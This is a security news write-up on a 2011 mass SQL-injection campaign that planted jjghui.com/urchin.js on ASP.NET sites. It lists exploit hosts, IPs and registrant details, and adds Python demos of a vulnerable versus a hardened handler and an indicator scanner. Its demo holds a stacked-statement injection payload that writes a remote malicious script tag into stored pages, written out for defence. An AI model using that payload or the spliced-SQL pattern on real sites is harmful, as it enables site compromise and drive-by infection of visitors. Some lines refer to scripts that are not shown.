Mass ASP.NET SQL Injection Infects Thousands Of Websites
Attackers have infected about 180,000 websites built on Microsoft's ASP.NET platform by using SQL injection to plant a reference to a malicious script, jjghui.com/urchin.js, in stored site content (the file name mimics the legacy Google Analytics tracker script of the same name). The campaign resembles the Lizamoon mass injection that spread a few months earlier.
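The injection mechanism the article describes, as an added example that is not code from the article or from Armorize: a Python/SQLite stand-in for the ASP + SQL Server stack the campaign targeted. The table, rows, handler names and the payload string are all constructed for illustration; the only detail taken from the article is the injected reference to jjghui.com/urchin.js. The vulnerable handler splices the request parameter into a SQL batch, so a stacked UPDATE appends the script tag to every stored page; the hardened handler binds the value as a parameter and rejects non-numeric input.

```python
import sqlite3

# Constructed stand-in for a site's content table (not data from the article).
SEED_ROWS = [
    ("Welcome", "<p>Hello</p>"),
    ("About", "<p>About us</p>"),
    ("Contact", "<p>Mail us</p>"),
]

# Tag in the shape the article describes: a remote script reference pointing
# at jjghui.com/urchin.js. Hypothetical text, not the campaign's real payload.
INJECTED_TAG = '<script src="http://jjghui.com/urchin.js"></script>'

# Stacked-statement payload: the expected numeric id, then an UPDATE that
# appends the tag to every row's body. Hypothetical, for illustration only.
PAYLOAD = f"1; UPDATE pages SET body = body || '{INJECTED_TAG}'"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, "
        "views INTEGER NOT NULL DEFAULT 0)"
    )
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def count_view_vulnerable(conn, page_id):
    """Vulnerable: the request parameter is spliced into the SQL text and the
    string is run as a batch. executescript() accepts stacked statements, like
    the classic ASP + SQL Server stack the victims ran, so an id of
    "1; UPDATE ..." executes the attacker's UPDATE as well."""
    conn.executescript(f"UPDATE pages SET views = views + 1 WHERE id = {page_id}")


def count_view_safe(conn, page_id):
    """Hardened: validate the type, then bind the value as a parameter so it is
    never parsed as SQL. Returns False (and touches nothing) on bad input."""
    try:
        pid = int(page_id)
    except (TypeError, ValueError):
        return False
    conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (pid,))
    conn.commit()
    return True


def infected_rows(conn):
    """Site-owner check: how many stored rows carry the injected reference."""
    return conn.execute(
        "SELECT COUNT(*) FROM pages WHERE body LIKE ?", ("%jjghui.com/urchin.js%",)
    ).fetchone()[0]


def remove_injected_tag(conn):
    """Clean-up: strip the tag from every row and return the remaining count.
    Useless on its own if the injectable parameter is left unfixed."""
    conn.execute("UPDATE pages SET body = REPLACE(body, ?, '')", (INJECTED_TAG,))
    conn.commit()
    return infected_rows(conn)


def run_demo():
    """Returns (rows infected via the vulnerable handler, via the safe one)."""
    vuln = make_db()
    count_view_vulnerable(vuln, PAYLOAD)
    safe = make_db()
    count_view_safe(safe, PAYLOAD)
    return infected_rows(vuln), infected_rows(safe)


def cleanup_demo():
    """Returns (infected rows before clean-up, after clean-up)."""
    conn = make_db()
    count_view_vulnerable(conn, PAYLOAD)
    return infected_rows(conn), remove_injected_tag(conn)


if __name__ == "__main__":
    print(run_demo())      # (3, 0)
    print(cleanup_demo())  # (3, 0)
```

Running it gives (3, 0): every stored page is infected through the vulnerable handler, none through the safe one. The same LIKE check is how a site owner finds injected rows in the real database, and remove_injected_tag shows the clean-up; cleaning the data without fixing the injectable parameter only lasts until the attacker's next request.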
The attack, which started on 9 October 2011, has affected almost 1,500 sites, all now blacklisted, and more than 80,000 pages in Google's index carry the injected JavaScript reference, according to Google.
The script targets visitors whose browser reports one of six languages: English, German, French, Italian, Polish and Breton. The check is visible in the deobfuscated script:
For those visitors it loads an iframe from one of two remote sites, www3.strongdefenseiz.in or www2.safetosecurity.rr.nu, which serve a set of browser drive-by exploits that install malware on the visitor's PC.
The exploits fire on page load: the visitor does not have to open a file or click a link, so the infection goes unnoticed. The exploits themselves are already public and patched, however, so the attack only succeeds against visitors running an outdated browser or out-of-date Adobe Reader, Adobe Flash or Java plug-ins; keeping those current defeats this campaign.
At the time of writing only six of 43 antivirus engines detect the malware: AntiVir, ByteHero, Fortinet, Jiangmin, McAfee and McAfee-GW-Edition.
Notably, the registration information for jjghui.com is the same as that used on the earlier Lizamoon domains:
Technical Contact:
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us
jjghui.com resolves to 146.185.248.3 (AS3999) in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352) in the US, hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to 67.208.74.71 (AS33597) in the US, hosted by InfoRelayOnlineSystems.
Taken together, the shared registrant details and the Lizamoon-style injection suggest this is the work of the same group behind the Lizamoon mass infection.
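The indicators above can be turned into a page check. The following is an added example, not code from the article or from Armorize: it parses fetched HTML for script and iframe references and flags any whose host is one of the three domains named here (assuming that list is complete for this campaign, which the article does not guarantee). The sample page is constructed. It matches on the host rather than on the file name, because the legitimate Google Analytics tracker is also named urchin.js and must not be flagged.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Indicator domains named in the article. A host matches if it equals one of
# these or is a subdomain (www3.strongdefenseiz.in, www2.safetosecurity.rr.nu).
IOC_DOMAINS = ("jjghui.com", "strongdefenseiz.in", "safetosecurity.rr.nu")


class _SrcCollector(HTMLParser):
    """Records the src attribute of every <script> and <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            for name, value in attrs:
                if name == "src" and value:
                    self.refs.append((tag, value.strip()))


def hostname_of(url):
    """Lower-cased host of an absolute or protocol-relative URL; '' if none."""
    return (urlsplit(url).hostname or "").lower()


def is_ioc_host(host):
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def scan_html(html):
    """Return [(tag, src)] for every script/iframe pointing at an IOC domain."""
    collector = _SrcCollector()
    collector.feed(html)
    collector.close()
    return [(tag, src) for tag, src in collector.refs if is_ioc_host(hostname_of(src))]


# Constructed sample page (not captured from a real victim): one legitimate
# urchin.js, one injected jjghui.com reference, and one hidden iframe.
SAMPLE_PAGE = """<html><body>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<h1>Welcome</h1>
<script src="http://jjghui.com/urchin.js"></script>
<iframe src="//www3.strongdefenseiz.in/" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, src in scan_html(SAMPLE_PAGE):
        print(f"{tag}: {src}")
```

For a site owner the more reliable place to look is the database itself, since the injected tag lives in stored content and reappears on every page that renders it; any hit means the site has an injectable parameter, not merely that one page was touched.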
1. ASP and ASP.NET websites are injected with the following script:
2. The contents of urchin.js are as follows:
3. The script above decodes to the following:
Discovered by Armorize: http://blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass-infection.html